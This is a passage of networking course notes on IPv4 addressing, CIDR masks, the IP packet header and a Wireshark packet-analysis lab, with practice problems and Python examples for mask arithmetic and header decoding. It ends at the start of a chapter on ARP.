God of the Internet. He formed the Internet Assigned Numbers Authority (see picture
above) and served as its head until his death at age 55. He was the guiding force behind a
number of Internet protocols.
On the ten-year anniversary of his passing, Vint Cerf offered the toast: “Here's to Jonathan
B. Postel, a man who went about his work diligently and humbly, who served all who wished
to partake of the Internet and to contribute to it, and who did so asking nothing in return but
the satisfaction of a job well done and a world open to new ideas.”
6. IP Address Blocks
When an organization is given a network ID, it is given an IP address and a mask. For example, an organization might be given
the block of IP addresses:
205.16.37.32/28
In this case, the first 28 bits determine the Network ID, and the final 4 bits are used for the Host ID. Thus, all hosts on this
network will have the first 28 bits in common:
205.16.37. 0 0 1 0 _ _ _ _
All hosts on this network will have the same first 28 bits (the Network ID). The organization can play with the last four bits
to dole out unique IP addresses to all of its hosts.
So, the organization can choose to make the host ID 0001, or 0101, or 1011, etc. It can use the last four bits to assign unique
IP addresses to all of its hosts. The organization has 2^4 = 16 different ways it can assign these last four bits.
From Forouzan, Data Communications and Networking, 2007
Any host on this network can have its address represented in CIDR notation by following the address with the mask. For
example, an individual host on the above network might have its IP address expressed as
205.16.37.39/28
More generally, a block of IP addresses is defined using the notation
W.X.Y.Z/n
where W.X.Y.Z defines any address in the block and /n defines the mask, i.e. the n leftmost bits are 1.
Practice Problem 13.8
You know that one of your organization’s IP addresses is 205.16.37.39 / 28.
(a)
Describe the mask qualitatively.
Solution:
(b)
What is the mask in binary?
Solution:
(c)
What is the mask in dotted decimal notation?
Solution:
(d)
Now, the mask bits with a 1 correspond to the “network-ID” and the mask bits with a zero correspond to the bits that
you can play with to assign IP addresses to your hosts. If that is the case, how many addresses have you been given?
Solution:
Now, we have to further complicate matters.
First complication: The first address in a block is termed the network address, and is normally not assigned to a host. That is,
the first address in your block, where the host bits all have a value of zero, is used to define your network to the rest of the
world. So the answer to part (d) of Practice Problem 13.8 has to be revised: We have 16 addresses, but the first is our network
address, which is not available to assign to a host.
Second complication: The last address in a block is termed the broadcast address, and is normally not assigned to a host. That
is, the last address in your block, where the host bits all have a value of one, is used to indicate "all hosts on this network", and
this address is thus not available to assign to a host.
Bottom line: When you calculate the number of IP addresses you have to play with, you first determine the number of bits in
the host-ID portion, and then use the formula:
Number of addresses available for assignment to hosts = 2^(number of bits in the host-ID portion) - 2
Practice Problem 13.9
You own a small organization that needs (and is given) 14 IP addresses for assignment to individual hosts. What is your mask
in dotted decimal notation?
Solution:
Practice Problem 13.10
As in the example above, you know that one of your organization’s IP addresses is 205.16.37.39 / 28. What is the network
address assigned to your organization?
Solution:
Last byte:
  Mask:
  Address:
  Result:
This is a major point of confusion for students. If I know that one of my machines has an IP address of
205.16.37.39
how can I tell that the network address I own is
205.16.37.32
The answer: by using the mask as we have shown.
Practice Problem 13.11
What is the network address of a network that has a host assigned the IP address: 182.44.82.16 / 26
Solution:
Practice Problem 13.12
What is the network address of a network that has a host assigned the IP address: 182.44.82.80 / 26
Solution:
So, as you can see, there is the potential for things to get very tricky here. If you knew a host had IP address 182.44.82.80 is
it obvious that the host is on a network with network address 182.44.82.64?
Here is an alternate way to find the network address (i.e., the first address in your block):
If the IP address of a host is W.X.Y.Z/n, set the 32 - n rightmost bits to zero.
Practice Problem 13.13
Using the technique above, determine the network address of a network that has a host assigned the IP address: 182.44.82.16 /
26
Solution:
Practice Problem 13.14
Using the technique above, determine the network address of a network that has a host assigned the IP address: 182.44.82.80 /
26.
Solution:
Practice Problem 13.15
Suppose one of your machines has the IP address 180.34.64.65 / 30.
(a) How many addresses do you have available for assignment to hosts?
(b) What is your network address?
Solution:
(a)
(b)
So much for the first address in your block. How do you find the last address (i.e., the broadcast address) in your block?
Here is a way to find the last address in your block:
If the IP address of a host is W.X.Y.Z/n, set the 32 - n rightmost bits to one.
Practice Problem 13.16
Suppose you know that one of your organization’s IP addresses is 205.16.37.39/28. What is the last address (the broadcast
address) in the block assigned to your organization?
Solution:
Summary of what you need to know: Given that you have a host with address W.X.Y.Z / n determine the number of
addresses you have in your block, as well as the first address (i.e., the network address) and last address (i.e., the broadcast
address).
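As an added worked example (our code, not part of the original notes), the following Python does the mask and block arithmetic of Sections 3 through 6 with explicit bitwise operations rather than the standard ipaddress module, so that each step matches the hand method above: it validates a mask as a run of ones followed by zeros, converts between dotted decimal and slash notation, and for any host written W.X.Y.Z/n returns the network address, the broadcast address, the first and last usable host and the 2^h - 2 count. The final function checks membership in the three private ranges listed in Section 8 below. The function names are our own.

```python
"""IPv4 mask and block arithmetic with explicit bitwise operations, so each
step matches the hand method in the chapter. Added example; the ipaddress
module would do the same, but hides the AND/OR that the notes teach."""

ALL_ONES = 0xFFFFFFFF


def to_int(dotted):
    """'131.122.220.30' -> 32-bit integer (leftmost octet is most significant)."""
    octets = [int(o) for o in dotted.strip().split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"bad IPv4 address: {dotted!r}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def to_dotted(value):
    """32-bit integer -> dotted decimal."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def mask_from_prefix(n):
    """/n -> mask: n ones followed by 32-n zeros."""
    if not 0 <= n <= 32:
        raise ValueError(f"prefix length out of range: {n}")
    return (((1 << n) - 1) << (32 - n)) & ALL_ONES


def is_valid_mask(dotted):
    """A mask is a run of ones followed by a run of zeros (Practice Problem 13.2).
    Inverting a valid mask gives 0...01...1, which is one less than a power of two."""
    inverted = ~to_int(dotted) & ALL_ONES
    return (inverted & (inverted + 1)) == 0


def prefix_from_mask(dotted):
    """Dotted-decimal mask -> n for slash notation."""
    if not is_valid_mask(dotted):
        raise ValueError(f"not a contiguous mask: {dotted}")
    return bin(to_int(dotted)).count("1")


def describe_block(host_cidr):
    """For any host written W.X.Y.Z/n, return the facts Section 6 asks for."""
    addr, n = host_cidr.split("/")
    n = int(n)
    mask = mask_from_prefix(n)
    network = to_int(addr) & mask              # Section 4: AND with the mask extracts the network ID
    broadcast = network | (~mask & ALL_ONES)   # host bits all set to one
    host_bits = 32 - n
    size = 1 << host_bits
    usable = max(size - 2, 0)                  # 2^h - 2: network and broadcast removed (/31, /32 are special cases)
    return {
        "mask": to_dotted(mask),
        "prefix": n,
        "network": to_dotted(network),
        "broadcast": to_dotted(broadcast),
        "first_host": to_dotted(network + 1) if usable else None,
        "last_host": to_dotted(broadcast - 1) if usable else None,
        "block_size": size,
        "usable_hosts": usable,
    }


PRIVATE_BLOCKS = ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")


def is_private(dotted):
    """True if the address lies in one of the three private ranges of Section 8."""
    value = to_int(dotted)
    for block in PRIVATE_BLOCKS:
        net, n = block.split("/")
        if (value & mask_from_prefix(int(n))) == to_int(net):
            return True
    return False


if __name__ == "__main__":
    for cidr in ("131.122.220.30/17", "192.168.1.77/26"):   # second address is made up
        print(cidr, describe_block(cidr), "private:", is_private(cidr.split("/")[0]))
    for m in ("255.2.0.0", "255.255.0.0", "255.255.0.23", "255.255.64.0", "255.240.0.0"):
        print(m, "valid mask" if is_valid_mask(m) else "not a mask")
```

The `is_valid_mask` trick is worth remembering when checking configuration files: a value like 255.255.64.0 is accepted by many tools as a number but is not a mask, and the complement-and-increment test catches it in two operations.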
7. Special IP Addresses.
We already mentioned that an IP address whose network ID bits are set to the proper value but whose host bits are all zero refers
to the network itself.
Similarly, an IP address whose network ID bits are set to the proper value but whose host bits are all set to one is the broadcast
address for that network.
Here are more special IP addresses.
• The all-zeroes address (32 zeroes) means: “me”. This address is used by a host that does not know its IP address.
• The all-ones address (32 ones): all hosts on this network.
Why would this ever be used? A host may not know its own IP address (and hence does not know its network ID).
A host that just starts up and doesn't know who or where it is uses the all-zeroes address to refer to itself and the all-ones address
to refer to "anyone else out there."
• The reserved block 127.0.0.0/8 is used for “loopback”; the address normally used is 127.0.0.1. These addresses are used
for testing on the local computer. When a loopback address is used as a destination address, the computer does not send the
packet to the network.
8. Private IP Addresses
IANA has reserved the following IP addresses for private use:
  10.0.0.0     to  10.255.255.255
  172.16.0.0   to  172.31.255.255
  192.168.0.0  to  192.168.255.255
(Table from Tanenbaum, Chapter 5.)
You are allowed to use any of these addresses at will without permission from anyone. Note that this equates to almost 18
million addresses (almost ½ of 1% of the potential IP addresses). Private IP addresses cannot be used on the Internet; Internet
routers will not forward packets addressed to them. These addresses must be unique within a private network, but do not need
to be unique globally.
Practice Problem 13.17
(a) Can more than one organization assign the number 172.18.3.1 to one of its machines?
(b) If no, why not? If yes, does this violate the cardinal rule: No two machines on the Internet can have the same IP address
at the same time?
(c) What happens if I try to launch a packet with the destination address 172.18.3.1 onto the Internet?
Solution:
(a)
(b)
(c)
III. The Uniform Packet Format
We mentioned that IP was developed with the idea that to internetwork efficiently, we must have an agreed upon packet format.
The Internet Protocol defines a hardware-independent packet format. The IP packet has the basic structure:
  Header | Data
The size of the header can vary from 20 to 60 bytes. The maximum allowed total size of an IP packet (header + data) is just
under 64 KB: 65,535 bytes, the largest value a 16-bit length field can hold.
The IP packet format:
[Figure 20.5, IPv4 datagram format, from Forouzan, Data Communications and Networking, McGraw Hill, 2007.]
We offer a brief explanation for the various fields:
• Version: Current version is IP version 4.
• HLEN: length of the header (in 4-byte increments): Minimum: 5, Maximum 15. (Note: In practice, the vast majority
of IP packets contain no options and thus have the minimum header length of 5, i.e., 20 bytes.)
• Type of service: This isn’t used much in practice. We'll ignore it.
• Total length: Total number of bytes in the packet (header plus data). Max is 65,535.
• Flags and fragmentation offset: These fields will not be covered in this class.
• Time to live: This eight-bit field serves as a hop-counter. The originating source of the IP packet places a number in
this field (and since the field is eight bits, the maximum number that can be placed in this field is 255). The value
stored in the time-to-live field is then decremented by one by each router that encounters the packet. When the
time-to-live (hop-counter) reaches zero, the packet is discarded. The purpose of this field is to prevent a packet from
wandering around the Internet aimlessly forever.
• Protocol: TCP or UDP or other? (TCP is protocol number 6, UDP is 17.)
• Header checksum: A checksum of the header only.
• Addresses. If you don't know what these are, you've been asleep for the past hour!
• Options: These options will not be covered in this class.
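An added example (our own code, neither Wireshark's nor part of the original notes) that does by hand what the Packet Details Pane does for you in Part 3 of the exercise, and decodes the header fields just listed: it slices the 14-byte Ethernet header (destination, source, EtherType), decodes the fixed 20-byte IPv4 header, verifies the RFC 1071 header checksum, and shows what a router does to the header at each hop. The frame bytes are constructed for the example: the MAC and IP addresses are made up, the payload is zeros, and the checksum value 0x52c9 was computed for this header.

```python
"""Decode an Ethernet frame and the IPv4 header inside it from raw bytes, as
shown in Wireshark's Packet Bytes Pane, and verify the header checksum.
Added example; SAMPLE_FRAME is constructed, not captured."""
import struct

ETHERTYPES = {0x0800: "IPv4", 0x0806: "ARP", 0x86DD: "IPv6"}
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"

# Constructed frame: made-up MAC and IP addresses, 20 zero bytes standing in
# for the TCP segment. IP header fields, in order: 45 (version 4, HLEN 5),
# 00 (TOS), 0028 (total length 40), 1c46 (identification), 4000 (DF flag,
# offset 0), 40 (TTL 64), 06 (TCP), 52c9 (checksum computed for this header),
# 0a000005 (10.0.0.5), c0a80114 (192.168.1.20).
SAMPLE_FRAME = bytes.fromhex(
    "001122334455" "66778899aabb" "0800"
    "45000028" "1c464000" "400652c9" "0a000005" "c0a80114"
) + bytes(20)


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def parse_ethernet(frame):
    """First 14 bytes: 6-byte destination, 6-byte source, 2-byte EtherType.
    Returns (header fields, payload)."""
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    dst, src = mac_str(frame[:6]), mac_str(frame[6:12])
    etype = struct.unpack("!H", frame[12:14])[0]
    fields = {"dst": dst, "src": src, "ethertype": etype,
              "payload_type": ETHERTYPES.get(etype, "unknown"),
              "is_broadcast": dst == BROADCAST_MAC}
    return fields, frame[14:]


def ip_checksum(header):
    """RFC 1071 ones-complement sum of the header's 16-bit words.
    Run over a header with the checksum field zeroed it yields the value to
    store; run over a correct header (field included) it yields 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_ipv4(packet):
    """Decode the fixed 20-byte IPv4 header fields of Section III."""
    if len(packet) < 20:
        raise ValueError("packet too short for an IPv4 header")
    vihl, tos, total_len, ident, flags_frag, ttl, proto, csum = \
        struct.unpack("!BBHHHBBH", packet[:12])
    version, hlen = vihl >> 4, (vihl & 0x0F) * 4    # HLEN is in 4-byte units
    if version != 4 or hlen < 20:
        raise ValueError("not an IPv4 header")
    return {"version": version, "hlen": hlen, "tos": tos, "total_length": total_len,
            "identification": ident,
            "dont_fragment": bool(flags_frag & 0x4000),
            "more_fragments": bool(flags_frag & 0x2000),
            "fragment_offset": flags_frag & 0x1FFF,
            "ttl": ttl, "protocol": proto, "checksum": csum,
            "src": ip_str(packet[12:16]), "dst": ip_str(packet[16:20]),
            "checksum_ok": ip_checksum(packet[:hlen]) == 0}


def forward_one_hop(packet):
    """What a router does to the header: decrement TTL and recompute the
    checksum. Returns (packet as forwarded, None), or (None, reason) when the
    TTL reaches zero and the packet is discarded."""
    hlen = (packet[0] & 0x0F) * 4
    hdr = bytearray(packet[:hlen])
    if hdr[8] <= 1:
        return None, "TTL reached zero: packet discarded"
    hdr[8] -= 1
    hdr[10:12] = b"\x00\x00"                 # zero the field before summing
    struct.pack_into("!H", hdr, 10, ip_checksum(bytes(hdr)))
    return bytes(hdr) + packet[hlen:], None


if __name__ == "__main__":
    eth, payload = parse_ethernet(SAMPLE_FRAME)
    print("Ethernet:", eth)
    ip = parse_ipv4(payload)
    print("IPv4:", ip)
    forwarded, reason = forward_one_hop(payload)
    print("after one hop:", reason or parse_ipv4(forwarded))
```

Two things the code makes visible that the field list does not: the checksum covers only the header, so a router that changes the TTL must rewrite the checksum too (both values differ after `forward_one_hop`), and the checksum is a ones-complement sum, not a cryptographic check, so it catches corruption but says nothing about whether the addresses were forged.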
Problems
1. Suppose you transfer a computer from the ECE Department at USNA to the EECS Department at USMA. Will its MAC
address need to be changed? Will its IP address need to be changed?
2. (a) What is the network address of 10.64.128.200 /28?
(b) How many IP addresses are there in the block of IP addresses assigned to this network?
(c) What is the first available IP address that can be assigned to a host?
(d) What is the last available IP address that can be assigned to a host?
(e) What is the broadcast address for this network?
(f) Can the IP addresses assigned to this network be routed across the Internet? Justify your answer.
3. (a) Assume an IP packet traverses multiple routers on its way from source to destination. Which IP packet header
fields change from router to router?
(b) You receive an IP datagram containing 1024 bytes (assume no options). What is the value of the HLEN and
TOTAL LENGTH fields?
(c) What is the purpose of the Time-to-Live field in the IP packet header?
(d) If an IP packet header is 32 bytes total, what value should the HLEN field contain for this packet?
(e) A host has just been powered on and wishes to receive an IP address from the DHCP server. How can it send
a request over a TCP/IP network if it does not have an IP address and does not know the address of the DHCP
server?
(f) If the Time To Live (TTL) field in the header of an IP packet has the value 000000001, what will happen to this
packet when it travels to the next hop?
4. (a) Write the following masks in slash notation.
(i) 255.255.255.0
(ii) 255.240.0.0
(b) Write the following masks in dotted decimal notation.
(i) /16
(ii) /9
5. The purpose of the header checksum field in an IP header is to (choose the correct answer):
(a) Provide for error checking between source and destination
(b) Check that the headers from previous layers have been filled out correctly
(c) Add up the bytes in the message and make sure it can fit in one packet
(d) This field is no longer used for IP communications
6. As a network administrator you notice something fishy going on in your network. In order to diagnose the problem
you start sniffing packets using Wireshark and find an IP packet with the following header (shown here in
hexadecimal).
45 00 00 34
60 ad 40 00
3f 06 03 5d
83 78 a8 1f
83 78 28 aa
(a) What version of IP is this packet using?
(b) What is the source address?
7. Consider IP address, 136.52.100.34/19.
(a) What is this address’s network mask (in dotted decimal)?
(b) What is this address’s network address?
(c) What is this network’s broadcast address?
(d) How many hosts can this network accommodate?
8. In a brief sentence, explain what is meant by the Internet Protocol principle connectionless.
9. True or False: An IP address is normally expressed in hexadecimal.
10. Write the network address for IP address 146.25.129.17/20 in dotted decimal format.
11. The purpose of the time to live field in an IP header is to (choose the correct answer):
(a) Show the number of hops to the destination
(b) Prevent a packet from endlessly traversing the internet
(c) Translate a packet to classless routing (CIDR)
(d) Amplify the network mask
12. Which one of the following is NOT a principle behind the design of the Internet Protocol?
(a) user-defined
(b) best-effort
(c) unreliable
13. Fill in the blanks: An IP address is____bits long. When expressed in dotted decimal form, every ___ bits form an
octet. The integer value of a single octet can range from ____ to ____ .
14. In one sentence, state the purpose of a network mask.
15. Assume you are provided the IP address 128.32.14.2 and a network mask of 255.255.254.0.
(a) What is your network ID expressed in dotted decimal notation?
(b) Continuing from part (a), state the number of bits that can be used to assign host IP addresses.
(c) Continuing from part (b), determine how many valid host IP addresses you can assign on your network.
(d) Assume that host IP addresses are assigned sequentially from lowest to highest on your network. What is the last
valid IP address that can be assigned to a host on your network expressed in dotted decimal form?
16. Circle the best word, or fill in the blanks, to complete the statements below that pertain to IPv4 addresses.
• An IP address is a software / hardware address which is made up of 16 / 512 / 32 bits.
• An IP address consists of two parts, a ____________________ ID and a ____________________ ID.
• If all of the ____________________ ID bits of an IP address are zero, then the address is the network / broadcast
address.
• If all of the ____________________ ID bits of an IP address are one, then the address is the network / broadcast
address.
17. Show all work:
(a) What is the network address of 156.143.10.55 / 21 ?
(b) How many hosts can be assigned a unique IP address on this network?
(c) What is the first available IP address that can be assigned to a host?
(d) What is the last available IP address that can be assigned to a host?
18. Can private IPv4 addresses be routed across the Internet? If not, what is the purpose of private IP addresses? If so,
explain how they can be routed across the Internet.
19. Answer True or False to each of the following statements:
(a) An IP address is a software address.
(b) IP addresses are used at the network layer.
(c) There are 6 bytes in an IP address.
(d) Once set, the IP address of a computer never changes.
20.
Select from the following those that are valid IPv4 network masks. (There may be more than one correct answer.)
(a) /45
(b) 255.255.128.0
(c) 128.255.255.0
(d) 255.255.240.0
(e) /16
21. You are a network administrator and given the following block of addresses from your ISP:
137.18.129.128/27
(a) How many hosts can you support on this network?
(b) What is the first possible host ID?
(c) What is the last possible host ID?
(d) What is the broadcast address for your network?
22. Suppose you know the first address and last address in a block of IPv4 addresses (i.e., you know the network address
and the broadcast address). Explain how you can determine the total number of IPv4 addresses in the block.
23. Express the following IP address in dotted-decimal notation:
01010101 . 10000101 . 00110011 . 00011111
24. Suppose you are given a block of IPv4 addresses with a prefix length of 14 – i.e., there are 14 bits in the network-ID
portion of your addresses. How many addresses are in your block?
25. Express the mask /14 in dotted decimal notation.
26. Express the mask 255.240.0.0 in slash notation.
27. You wake up one morning, stagger over to your computer and exclaim: "Wow, one of the IP addresses in my block
happens to be 140.150.16.17/18 !" Overcome with excitement, you set out to determine the first and last
addresses in your block that can be assigned to hosts. What do you come up with?
28. Consider the Time-to-live field in the IP packet header.
(a) Can the value stored in this field be equal to the decimal value of zero? Explain.
(b) Can the value stored in this field be equal to the decimal value of twenty? Explain.
(c) Can the value stored in this field be equal to the decimal value of three hundred? Explain.
29. Using Wireshark, you examine the header of an IP packet, which starts out as:
45 00 00 4E
00 10 00 00
12 06 23 c5
etc., etc.
(a) How many bytes are in this IP packet's header?
(b) How many bytes are there in the data portion of this IP packet?
(c) How many more routers can this packet travel to before it is thrown away by a router?
30. Suppose an IP packet's header has no options. Which fields of the header can change as the packet travels from router
to router? (Ignore the flag field and the fragmentation offset field.)
Security Exercise 13
Part I: Your IP Address
You learned today that all computers connected to the Internet have an alternative address in addition to the physical address.
This other address was referred to as IP address. We need IP addresses to communicate over the Internet. In fact: Every
computer on the Internet needs a unique IP address (in addition to its unique MAC address).
So, let’s begin by finding out our IP address. From the Windows command prompt, type ipconfig/all
Question 1. What is your IP address for your wireless LAN?
So we have an Ethernet address and an IP address. So, what again is an IP address? We mentioned that in order to make a
number of dissimilar networks "appear" to be one single happy network, we must use a single global addressing scheme for
all people on all networks. That’s where the Internet Protocol (IP) comes in. IP assigns to each computer a unique 32-bit IP address.
This IP address is a "software address"; it is not a hardware address. To send a packet over the Internet, we must use the
destination's IP address, not the physical address.
This point bears repeating: Your IP address exists in software only. Your computer’s IP address is in no way “burned in” to
the hardware, as your hardware address is. Tomorrow your computer might have a different IP address, but it will have the
same physical address.
To make IP addresses easy to read, they are expressed in dotted-decimal notation. Each 8 bits of the 32 bit address is expressed
as a decimal value, separated by periods. Let's review by answering a few questions.
Question 2. State whether the following IP addresses are valid or not; for those that are invalid, state the reason.
(a) 129.11.11.239
(b) 221.34.8.9.20
(c) 193.131.28.253
(d) 78.45.300.15
"Nothing good comes in life or athletics unless a lot of hard work has preceded the effort. Only temporary success is
achieved by taking short cuts."
Part II: Packet Analysis
Start up VMware Workstation and power-on your Cyber2 VM. Then launch Wireshark by selecting:
Applications > Internet > Wireshark (as root)
Under File, click Open and highlight the file named packets:
And then hit Open.
Recall that the top pane is the Packets List Pane. Starting at the left, we have the number (No) column (each packet that is
captured is sequentially numbered by Wireshark) followed by the Time column (which indicates the relative time that each
packet was received, with the first packet arriving at t = 0).
The next two columns indicate the source and destination IP addresses for the packet.
Question 3. What is the IP address of the computer that generated the 21st packet?
The next column indicates which protocol is used in the packet. We have not discussed all of these in class yet, but some of
them may ring a bell from SI110.
The last column provides some additional information about the packet.
Let’s look at packet 5182.
Question 4. How many seconds into the packet capture was this packet sent?
Question 5. What is the IP address of the sender of this packet?
Question 6. What is the IP address of the receiver of this packet?
Hmm…so we can see who is talking to whom. (Details about communication that do not reveal the contents of the
communication are termed metadata.)
Now, let’s look at the Packet Details pane for this packet:
This shows the protocols used by this packet. So, for instance, we see that this packet used Ethernet, the Internet Protocol (IP)
and the Transmission Control Protocol (TCP). By clicking on the arrow sign we can expand and collapse each of the listed
protocols.
The bottom pane, the Packet Byte pane, shows the data in the selected packet (in this case, packet 5182) in hexadecimal.
Question 7. How many bytes of data are in this frame?
Now, let’s look at the Internet Protocol in more detail. Click the arrow sign next to Internet Protocol and you should see this:
Question 8. What version of the Internet Protocol (IP) is being used?
Question 9. IP uses a checksum for error detection. Did this packet pass the checksum?
The IP packet format consists of a header, followed by data. The format of just the header is:
Forouzan, Data Communications and Networking, 4th ed, 2007
Let’s find the start of the IP packet. Highlight the line that says Version 4 and the hex code should highlight in the bottom
window. Starting at this location, the packet is:
45 00
01 57 36 e3 40 00 3f 06 2c 04 83 78 a8 1f 83 78
28 aa 04 d9 0c 3b a9 5b 18 98 59 96 ad 43 50 18
f5 3c 5c 6f 00 00 17 03 01 00 60 6d f0 04 92 b6
d7 66 cd 9e d5 4c b8 17 f5 25 26 06 b5 eb b8 3e
c7 92 37 d3 28 36 78 8c 1e 7f 83 4f 6d 8a 24 7e
90 7d 88 ef 3d b4 ff e2 17 b7 42 67 6a 34 0b 43
43 9d 49 8e 48 2f 1b 91 fa 05 bf a5 8a 61 63 4c
Question 10. What is the meaning of the first hexadecimal number (4)?
The next hexadecimal number (5) indicates the length of the IP packet’s header in units of 4 bytes.
Question 11. How many bytes are in the header of this IP packet?
Question 12. Does your answer to Question 11 match the data provided in the Packet Details Pane?
Question 13. Write down the hexadecimal numbers that correspond to the Total Length.
Question 14. Write out the hexadecimal numbers in Question 13 as a binary number.
Question 15. Convert the binary number in Question 14 to a decimal (base 10 number).
The Total Length entry gives the size of the IP packet in bytes.
Question 16. Does the number you calculated in Question 15 match the data provided in the Packet Details Pane?
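The field-by-field decoding that Questions 10 to 16 walk through by hand, and the list of header fields in the notes above, as an added example; this is my code, not part of the lab or the notes. It decodes a constructed 20-byte header (my own bytes and addresses, not taken from the packets capture), checks the header checksum the way a receiver does, and models what one router does to the header: verify the checksum, decrement the TTL, recompute the checksum, and discard the packet when the TTL would reach zero. Function names are my own.

```python
import struct

# Constructed 20-byte IPv4 header (not from the notes or the lab capture):
# version 4, HLEN 5 (20 bytes), TOS 0, total length 40, ID 0x1c46, flags DF,
# TTL 64, protocol 6 (TCP), checksum 0x3238, src 192.0.2.10, dst 198.51.100.20.
SAMPLE_HEADER = bytes.fromhex("4500 0028 1c46 4000 4006 3238 c000 020a c633 6414")

PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}


def ipv4_checksum(header: bytes) -> int:
    """Header checksum: one's complement of the one's-complement sum of the
    16-bit header words, computed with the checksum field itself set to zero."""
    words = bytearray(header)
    words[10:12] = b"\x00\x00"
    total = 0
    for i in range(0, len(words), 2):
        total += (words[i] << 8) | words[i + 1]
    while total >> 16:                      # fold carries back in (end-around carry)
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_header(data: bytes) -> dict:
    """Decode the fields discussed in the notes from the raw bytes of a packet."""
    if len(data) < 20:
        raise ValueError("an IPv4 header is at least 20 bytes")
    version, hlen = data[0] >> 4, data[0] & 0x0F   # the first two hex digits (4 and 5)
    header_len = hlen * 4                          # HLEN counts 4-byte units
    if version != 4 or hlen < 5 or len(data) < header_len:
        raise ValueError("not a well-formed IPv4 header")
    tos, total_length, ident, flags_frag, ttl, proto, checksum = struct.unpack(
        "!BHHHBBH", data[1:12])
    return {
        "version": version,
        "hlen": hlen,
        "header_len": header_len,
        "total_length": total_length,              # header plus data, in bytes
        "data_len": total_length - header_len,
        "ttl": ttl,
        "protocol": PROTOCOLS.get(proto, str(proto)),
        "checksum": checksum,
        "checksum_ok": ipv4_checksum(data[:header_len]) == checksum,
        "src": ".".join(str(b) for b in data[12:16]),
        "dst": ".".join(str(b) for b in data[16:20]),
        "options": data[20:header_len],            # empty when HLEN == 5
    }


def with_ttl(header: bytes, ttl: int) -> bytes:
    """Copy of the header with a new TTL and a recomputed header checksum."""
    h = bytearray(header)
    h[8] = ttl
    struct.pack_into("!H", h, 10, ipv4_checksum(bytes(h)))
    return bytes(h)


def forward_hop(header: bytes):
    """What one router does to the header: verify the checksum, decrement the TTL,
    recompute the checksum. Returns None when the packet is discarded."""
    fields = parse_ipv4_header(header)
    if not fields["checksum_ok"]:
        return None                                # corrupted header: drop it
    if fields["ttl"] <= 1:
        return None                                # TTL would reach zero: drop it
    return with_ttl(header[:fields["header_len"]], fields["ttl"] - 1)


if __name__ == "__main__":
    for name, value in parse_ipv4_header(SAMPLE_HEADER).items():
        print(f"{name:>13}: {value}")
    print("after one hop, TTL =", parse_ipv4_header(forward_hop(SAMPLE_HEADER))["ttl"])
```

Feeding the header bytes from the Packet Bytes pane into parse_ipv4_header gives the same values Wireshark shows in the Packet Details pane; the two fields that differ after forward_hop (TTL and checksum) are exactly the ones a router rewrites on every hop.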
Is translating these hexadecimal numbers to decimal, and interpreting them, fun? Probably not, even for Computer Engineering
students. This data at the bottom is called the “raw hex” or the “hex dump.” There was a time when this was what we “saw”
when we used a packet sniffer. One of the nice things about Wireshark is that it provides a translation of the hex dump, and so
we will usually not have to pay attention to the bottom pane. The bottom pane is what has actually been sniffed…remember,
everything is bits!
Note that at the right of the hex dump, we see what looks like gibberish. This represents the ASCII translation of what is in
the hex dump. Since most of these hex figures are not intended to be ASCII values, the result looks like random characters.
(Note that a nonprintable ASCII character translates as a period.)
Every so often, though, we will be able to see usable text in this field. For example: Look at packet 136, which is a DNS
request.
Question 17. Looking at the bottom pane (the “raw” hex dump), what name do you suppose the user is requesting
the IP address for?
Notice that this info is also available in the middle pane. The info in the middle pane is an attempt to provide a high-level
best guess snapshot about the packet.
Look at frame #4955.
Question 18. What is the source IP address?
Question 19. What is the meaning of this source IP address?
Security Exercise 13 Answer Sheet
Name:
Question 1:
Question 2:
(a)
(b)
(c)
(d)
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:
Question 18:
Question 19:
Chapter 14: Routing Part I
Objectives:
(a) State the purpose of the Address Resolution Protocol and describe its role in facilitating communication.
(b) Describe the mechanism for spoofing an ARP cache with misinformation.
(c) Describe how routing works at the network layer.
(d) Construct an optimal routing table for a router given a network diagram and using address aggregation.
(e) Describe how to make a routing decision based on the longest mask matching principle given a network diagram and a
destination IP address.
If you find the above cartoon outlandish, wait till you read this:
http://www.thefiscaltimes.com/Articles/2013/10/08/2-Billion-NSA-Spy-Center-Going-Flames
I. Address Resolution
We mentioned that for the Internet to work effectively, we must have an agreed-upon global addressing scheme. Last lecture, we
discussed the addressing scheme used by the Internet Protocol, and mentioned how it is employed to make a group of different
networks appear to be a single network. This global address is the IP address.
Thus, from the lofty perspective of the network-layer, everyone using the network can be identified by their IP address, and
everyone using the network can interpret IP packets.
But… Wait a minute… Different physical networks do in fact exist. When sending data, the software at the network layer
works with IP addresses but, unfortunately, the data link layer and the physical layer hardware do not speak IP; i.e., the physical
and data link layers do not understand IP addresses or IP packets.
To be clear: A data link frame must use the frame format and addressing scheme for the specific technology or product in use.
Ethernet, for example, only understands 48-bit Ethernet addresses properly packaged within Ethernet frames. Put another way:
If we were somehow to place an IP packet directly over Ethernet, the Ethernet protocol would not know what to make of it.
So, IP addresses must be translated to data link layer addresses before a frame can be sent. And the IP packet itself must be
placed (encapsulated) within the data field of the Ethernet frame.
Translating from an IP address to a hardware address is called address resolution.
1. Address Resolution Schemes. Two address resolution techniques exist:
A. Table Look-up. A network administrator could set up a table that provides the IP address to data link layer address
associations:
[Table with two columns: IP address, Data link layer address]
When the software has an IP address and needs to determine the corresponding data-link address, it consults the table.
Unfortunately, if you ask a network administrator to maintain such a table for a large, complex and dynamic network, they
will want to kill you.
B. Message Exchange. Consider this scheme instead: A computer that needs to translate an IP address to a data-link address
sends a message requesting this information. This request essentially says: "I want to send data to the user with IP address
x; does anyone know the data-link layer address of the user with IP address x."
We presume that each user knows their own Ethernet address and their own IP address. Another computer replies with
